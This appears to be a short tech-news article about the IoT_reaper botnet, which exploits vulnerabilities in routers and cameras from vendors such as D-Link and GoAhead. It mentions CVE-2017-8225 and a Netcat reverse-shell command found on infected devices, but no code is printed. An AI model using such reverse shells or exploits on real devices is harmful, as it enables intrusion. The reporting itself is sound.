Just a year after Mirai malware held the world to ransom when it enslaved millions of IoT devices into a botnet network which cyber-criminals used in launching massive DDoS attacks -- disrupting several internet services around the world. Security researchers however, warns that last year occurrence might repeat itself.
Spotted first in September by security researchers at QIhoo 360, the new malware which is dubbed "IoT_reaper", doesn't depend cracking weak passwords in IoT devices to enslave them into botnet network but instead exploits for vulnerablities.
Also Read: The Mirai threat: How Hackers could shut off 23 Countries access to the internet
The malware attempts to exploit several vulnerablities commonly found in different IoT devices. Targeted manufactures includes: D-link, TP-Link, AVTECH, NETGEAR, MikroTik, JAWS, GoAheada, Vacron, Synology and others.
Researchers believe that IoT_reaper malware has infected nearly 2 million devices with an infection rate of 10,000 new devices per day.
A check carried out by CheckPoint on an infected GoAhead device revealed that the attackers accessed the System.ini file to check for compromise. Normally, the System.ini file is contains the credentials of the user, but on the hacked device it contained a 'Netcat' command that opens a reverse shell to the attackers IP instead!
The check revealed that he GoAhead device which was infected using the CVE-2017-8225 vulnerability, was actually transmitting the malware after being infected. This actually explains the fast rate in which the malware is spreading.
As of now, those behind this are still unknown but one thing that is clear here is that the actors are preparing for a massive global attack.
Researchers at CheckPoint also warned of the forth coming attack;
"Our researcher suggests we are now experiencing the calm before an even more powerful storm. The next cyber hurricane is about to come."